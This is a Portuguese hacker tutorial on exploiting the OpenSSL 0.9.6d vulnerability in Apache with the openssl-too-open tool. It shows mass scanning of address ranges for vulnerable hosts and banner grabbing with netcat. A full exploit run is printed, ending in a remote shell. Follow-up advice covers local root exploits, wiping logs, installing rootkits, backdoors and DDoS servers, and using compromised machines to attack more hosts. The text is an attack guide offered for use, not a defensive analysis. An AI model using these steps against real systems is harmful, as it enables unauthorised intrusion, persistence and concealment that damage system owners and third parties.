1 - Introdução
2 - Openssl-to-open
3 - Buscando vitimas
4 - Explorando
5 - D1cas
6 - Conclusão


1 - Introdução


Ae pessoal so eu o Stack de novo com mais uma técnica Hax0r pra vcs !!!

Foi descoberta uma vulnerabilidade no Apache, no OpenSSL que atinge as versoes 0.9.6d e anteriores essa vulnerabilidade
foi rapidamente usada para explorar milhares de sistemas, o worm slapper se propaga explorando essa vulnerabilidade.
Nesse TXT demonstrarei como explorar o sistema e ganhar uma shell nobody e depois se tornar root.

Requerimentos:

1 cérebro
1 Computador
1 teclado
1 mouse
- Internet
- linux
- openssl-to-open (veremos abaixo)


2 - OpenSSL-to-open


Essa é uma ferramenta que todo instruso pede a Deus ! ela tem um scanner em massa rapido podendo varrer centenas de
milhares de host em horas !! vem com o exploit tb para:

- Gentoo (apache-1.3.24-r2)
- Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
- Slackware 7.0 (apache-1.3.26)
- Slackware 8.1-stable (apache-1.3.26)
- RedHat Linux 6.0 (apache-1.3.6-7)
- RedHat Linux 6.1 (apache-1.3.9-4)
- RedHat Linux 6.2 (apache-1.3.12-2)
- RedHat Linux 7.0 (apache-1.3.12-25)
- RedHat Linux 7.1 (apache-1.3.19-5)
- RedHat Linux 7.2 (apache-1.3.20-16)
- Redhat Linux 7.2 (apache-1.3.26 w/PHP)
- RedHat Linux 7.3 (apache-1.3.23-11)
- SuSE Linux 7.0 (apache-1.3.12)
- SuSE Linux 7.1 (apache-1.3.17)
- SuSE Linux 7.2 (apache-1.3.19)
- SuSE Linux 7.3 (apache-1.3.20)
- SuSE Linux 8.0 (apache-1.3.23-137)
- SuSE Linux 8.0 (apache-1.3.23)
- Mandrake Linux 7.1 (apache-1.3.14-2)
- Mandrake Linux 8.0 (apache-1.3.19-3)
- Mandrake Linux 8.1 (apache-1.3.20-3)
- Mandrake Linux 8.2 (apache-1.3.23-4)


Ela é na verdade um pacote zipado lógico !!! na verdade só precisamos dela e dela pra ganhar o shell nobody !

pegue ela no packetstorm
http://packetstormsecurity.nl/


3- Buscando Vitimas


Lógicamente já disse acima que essa tool já vem com o scanner ! é facil usar mas como sou bonzinho vou ensinar


a tool

openssl-scanner scans a number of hosts for vulnerable OpenSSL
implementations.

: openssl-scanner : OpenSSL vulnerability scanner
by Solar Eclipse <[email protected]>

Usage: ./openssl-scanner [options] <host>
-i <inputfile> file with target hosts
-o <outputfile> output log
-a append to output log (requires -o)
-b check for big endian servers
-C scan the entire class C network the host belogs to
-d debug mode
-w N connection timeout in seconds

Examples: ./openssl-scanner -d 192.168.0.1
./openssl-scanner -i hosts -o my.log -w 5

Não entendeu vai ser burro lá na esquina ! tudo bem mais um exemplo !!!

$ ./openssl-scanner -C 192.168.0.0
: openssl-scanner : OpenSSL vulnerability scanner
by Solar Eclipse <[email protected]>

Opening 255 connections . . . . . . . . . . done
Waiting for all connections to finish . . . . . . . . . . . done

192.168.0.136: Vulnerable

Veja ele scanneia 192.168.0.0 até 192.168.0.255 e acha 1 pc bugado !
ele scanneou apenas a classe C ou seja a ultima parte do IP * logicamente ele scanneia classes B tb !!!!

Linha acima é bastante pequena, vc pode usar de modo inteligente varrendo algumas centenas de milhares de ips q é
o q qualquer um com 5 neuronios ou mais faria assim vc teria dezenas de pcs a explorar !!!!
nao vai querer outro exemplo né ? acho q ja deu pra entender é sí varrer as classes B !!!!!!!

4- Explorando


Para explorar tb é mole !


Usage: ./openssl-too-open [options] <host>
-a <arch> target architecture (default is 0x00)
-p <port> SSL port (default is 443)
-c <N> open N apache connections before sending the shellcode (default is 30)
-m <N> maximum number of open connections (default is 50)
-v verbose mode

Supported architectures:
0x00 - Gentoo (apache-1.3.24-r2)
0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
0x02 - Slackware 7.0 (apache-1.3.26)
0x03 - Slackware 8.1-stable (apache-1.3.26)
0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)
0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
0x0c - SuSE Linux 7.0 (apache-1.3.12)
0x0d - SuSE Linux 7.1 (apache-1.3.17)
0x0e - SuSE Linux 7.2 (apache-1.3.19)
0x0f - SuSE Linux 7.3 (apache-1.3.20)
0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
0x11 - SuSE Linux 8.0 (apache-1.3.23)
0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)

Examples: ./openssl-too-open -a 0x01 -v localhost
./openssl-too-open -p 1234 192.168.0.1 -c 40 -m 80


Exemplos:

host bugado: 192.168.0.136

vamos usar o netcat

$ nc 192.168.0.1 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Tue, 17 Sep 2002 17:47:44 GMT
Server: Apache-AdvancedExtranetServer/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b
Connection: close
Content-Type: text/html


explorando:

./openssl-too-open -a 0x14 192.168.0.1
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse <[email protected]>

: Opening 30 connections
Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x810b3a0
ssl1 : 0x810b360
ssl2 : 0x810b4e0

* Addresses don't match.

: Opening 40 connections
Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x8103830
ssl1 : 0x80fd668
ssl2 : 0x80fd668

* Addresses don't match.

: Opening 50 connections
Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x8103830
ssl1 : 0x8103830
ssl2 : 0x8103830

: Sending shellcode
ciphers: 0x8103830 start_addr: 0x8103770 SHELLCODE_OFS: 184
Reading tag
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...

bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a; id; w;
Linux localhost.localdomain 2.4.8-26mdk #1 Sun Sep 23 17:06:39 CEST 2003 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
1:49pm up 4:26, 1 user, load average: 0.04, 0.07, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
bash-2.05$

-@@@@@

Fácil né usamos netcat pra saber o sistema e o server e saber qual opção usar no caso 0x14 caso vc nao conseguir
obter a versão pois mecheram no banner, ou pq vc é burro vc pode chutar todas as opções são 22!!!!!

Se o admin for burro e rodar o apache com privilégios de root vc obtem root facinho dp de executar o exploit !
porém é provavel q isso nao aconteça e entao vc terá privilégios de nobody ! mas isso nao vai durar mto!!!


5- D1cas


ROOT

Bom vamos logo dominar o sistema né ! vamos sair dessa droga de nobody !!!
Para ganhar ROOT é simples é só usar o ptrace baixe ele no packetstorm http://packetstormsecurity.nl/
se nao sabe usar leia o txt q acompanha ele !!!!!!!! lógicamente ele é xploit local se tem q baixar pra maquina
da vitima duh !!!!!

Logs

O Zap é o melhor prog pra limpar os logs baixe ele no mesmo site acima

Backdoors & Rootkit

Após se tornar root ! até o mais idioa dos invasores irá instalar algum tipo de backdoor ou rootkit para ter
acesso ao sistema ! isso é muito importante lembre-se vc deve ser o tipo de hacker "Never say goodbye"
lembre-se a hackers q tem centenas, até milhares de shells !

DDoS

Instale um server DDoS na vitma caso queira pode ser bastante útil !

* Pra quem nao sabe como baixar os arquivos do prompt de comando use o Wget ! AH!! lembrou né ? bom !

* Uma boa dica é instalar um server de ftp no seu pc ! para q do pc hackiado vc possa com facilidade transferir
arquivos ! todo hax0r faz isso !

* Limpe sempre o log

* Nao disperdice uma shell backdorize !!

* Use essa shell pra atacar outros pcs ! baixe o openssl-to-open pra ela tb e assim seu pc mais os outros q vc
invadiu scanneando junto podem varrer milhoes de hosts bem mais rapido !

* Guarde seus arquivos em um lugar bem escondido ! hacker "Elitoes" costumao instalar um rootkit em LKM como eles
modificam o sistema é possivel com ele impedir q determinador arquivos seja vistos ! é isso mesmo !
vc pode guardar tudo no diretorio /hacker q o admin vai da um ls / e nao aparece nda ! só o dono do rootkit vê !
faça isso tb ! no packetstorm a varios rootkits ! a equipe da TESO desenvolveu um mto bom tb !!!!
tipo se vc nao sabe nda de rootkit procure no google se informar pois sao ferramentas mto poderosas!


6-Conclusão


Pessoal aki acabou nosso TXT pretendo ensinar novas técnicas de invasão a linux ! meu proximo txt ensinara a invadir
um Solaris q todo mundo acha impenetravel !!! espero q tenham gostado do TXT caso queiram algum TXT sobre
um assunto interessante peçam pelo ICQ


Aí pessoal até a proxima !!!!

By Stack


 

Imprimir Topo>>>
Hosted by www.Geocities.ws

1